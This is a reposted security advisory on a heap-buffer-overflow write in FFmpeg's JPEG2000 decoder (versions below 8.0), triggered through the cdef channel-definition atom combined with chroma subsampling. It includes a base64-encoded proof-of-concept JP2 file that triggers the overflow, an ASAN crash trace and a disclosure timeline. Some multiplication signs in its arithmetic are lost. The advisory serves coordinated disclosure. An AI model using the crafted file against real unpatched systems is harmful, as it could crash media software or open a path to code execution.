FFmpeg - Heap-buffer-overflow write in jpeg2000dec

FFmpeg - Heap-buffer-overflow write in jpeg2000dec
该漏洞存在于JPEG2000解码器中，当使用色度子采样像素格式和cdef原子时，可能导致缓冲区溢出。攻击者可利用此漏洞引发远程代码执行或拒绝服务。影响版本为FFmpeg 8.0以下。 2025-9-8 00:0:44 Author: github.com(查看原文) 阅读量:2 收藏

Package

JPEG2000 (FFmpeg)

Affected versions

< ffmpeg 8.0

Summary

The vulnerability lies in the Channel Definition cdef atom of JPEG2000 which is used to define the mapping of associated components to channels. If a chroma-subsampled pixel format is used together with the cdef atom, a corner case can be triggered. For example, for a YUV420P frame with a 64x32 resolution, the Y component will be 6432+16+63=2127 bytes, and the U and V component will be 6432/2+16+63=1103 bytes. By choosing a cdef with cn=0 and asoc=2, the data for the full resolution luma component Y with a height of 32 can be written into the smaller subsampled chroma plane U with a height of 16, thus overflowing the frame buffer picture->data[plane] by 64*16=1024 bytes.

Severity

High - Allows an attacker to potentially gain remote code execution or cause denial of service.

Proof of Concept

The following base64 encoded poc.jp2 triggers the ASAN panic below:

AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABJanAyaAAAABZpaGRyAAAAIAAAAEAA
AwgHAAAAAAAPY29scgEAAAAAABIAAAAcY2RlZgADAAAAAAACAAEAAAACAAIAAAACAAAAympwMmP/
T/9RAC8AAAAAAEAAAAAgAAAAAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAMHAQEHAgIHAgL/UgAMAAAA
AQAGAgIAAf9cABYgQEhIUEhIUEhIUEhIUEhIUEhIUP+QAAoAAAAAAGcAAf+T32gQCYf/AAgH/wAI
BwAAAKHzggABuwAAp9oMC0FzRGLwAACj6gkACchYhMatzBLXAACh848AZRCkKnPzhveC/MUI/qlg
AACx+oF/UCiMWOlqioxY6WqKAAD/2Q==

ASAN panic:

==1929947==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51a0000106cf at pc 0x5643c58b5858 bp 0x7fe552bfe410 sp 0x7fe552bfe408
WRITE of size 1 at 0x51a0000106cf thread T1 (av:jpeg200:df0)
    #0 0x5643c58b5857 in write_frame_8 libavcodec/jpeg2000dec.c:2368:1
    #1 0x5643c58b5857 in jpeg2000_decode_tile libavcodec/jpeg2000dec.c:2389:9
    #2 0x5643c51560ad in avcodec_default_execute2 libavcodec/avcodec.c:92:17
    #3 0x5643c58ae7d7 in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2903:5
    #4 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
    #5 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
    #6 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
    #7 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
    #8 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o
    #9 0x7fe555a33b7a in start_thread nptl/pthread_create.c:448:8
    #10 0x7fe555ab17b7 in __GI___clone3 misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:78

0x51a0000106cf is located 0 bytes after 1103-byte region [0x51a000010280,0x51a0000106cf)
allocated by thread T1 (av:jpeg200:df0) here:
    #0 0x5643c424b70b in posix_memalign
    #1 0x5643c774c426 in av_malloc libavutil/mem.c:107:9
    #2 0x5643c7702fd7 in av_buffer_alloc libavutil/buffer.c:82:12
    #3 0x5643c7702fd7 in av_buffer_allocz libavutil/buffer.c:95:24
    #4 0x5643c7705007 in pool_alloc_buffer libavutil/buffer.c:369:26
    #5 0x5643c7705007 in av_buffer_pool_get libavutil/buffer.c:407:15
    #6 0x5643c5650349 in video_get_buffer libavcodec/get_buffer.c:233:23
    #7 0x5643c5650349 in avcodec_default_get_buffer2 libavcodec/get_buffer.c:285:16
    #8 0x5643c53b76d4 in ff_get_buffer libavcodec/decode.c:1683:11
    #9 0x5643c5ca1781 in thread_get_buffer_internal libavcodec/pthread_frame.c:1041:11
    #10 0x5643c5ca1781 in ff_thread_get_buffer libavcodec/pthread_frame.c:1050:15
    #11 0x5643c58aceed in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2882:16
    #12 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
    #13 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
    #14 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
    #15 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
    #16 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o

Thread T1 (av:jpeg200:df0) created by T0 here:
    #0 0x5643c4230115 in pthread_create
    #1 0x5643c40df235 in init_thread libavcodec/pthread_frame.c:912:11
    #2 0x5643c40deaa8 in ff_frame_thread_init libavcodec/pthread_frame.c:971:15
    #3 0x5643c5156d2f in avcodec_open2 libavcodec/avcodec.c:328:15
    #4 0x5643c428e011 in dec_open fftools/ffmpeg_dec.c:1601:16
    #5 0x5643c428ced0 in dec_init fftools/ffmpeg_dec.c:1666:11
    #6 0x5643c4296c28 in ist_use fftools/ffmpeg_demux.c:993:15
    #7 0x5643c429720b in ist_filter_add fftools/ffmpeg_demux.c:1029:11
    #8 0x5643c42b0b10 in ifilter_bind_ist fftools/ffmpeg_filter.c:685:11
    #9 0x5643c42b06b4 in fg_create_simple fftools/ffmpeg_filter.c:1234:11
    #10 0x5643c42d704e in ost_bind_filter fftools/ffmpeg_mux_init.c:1000:15
    #11 0x5643c42d1a99 in ost_add fftools/ffmpeg_mux_init.c:1536:15
    #12 0x5643c42cf1e5 in map_auto_video fftools/ffmpeg_mux_init.c:1640:16
    #13 0x5643c42c5b37 in create_streams fftools/ffmpeg_mux_init.c:1969:19
    #14 0x5643c42c5b37 in of_open fftools/ffmpeg_mux_init.c:3335:11
    #15 0x5643c42db146 in open_files fftools/ffmpeg_opt.c:1367:15
    #16 0x5643c42db146 in ffmpeg_parse_options fftools/ffmpeg_opt.c:1423:11
    #17 0x5643c431c06f in main fftools/ffmpeg.c:991:11
    #18 0x7fe5559caca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

Timeline

Date reported: 08/04/2025
Date fixed: 08/06/2025
Date disclosed: 09/08/2025

文章来源: https://github.com/google/security-research/security/advisories/GHSA-39q3-f8jq-v6mg
如有侵权请联系:admin#unsafe.sh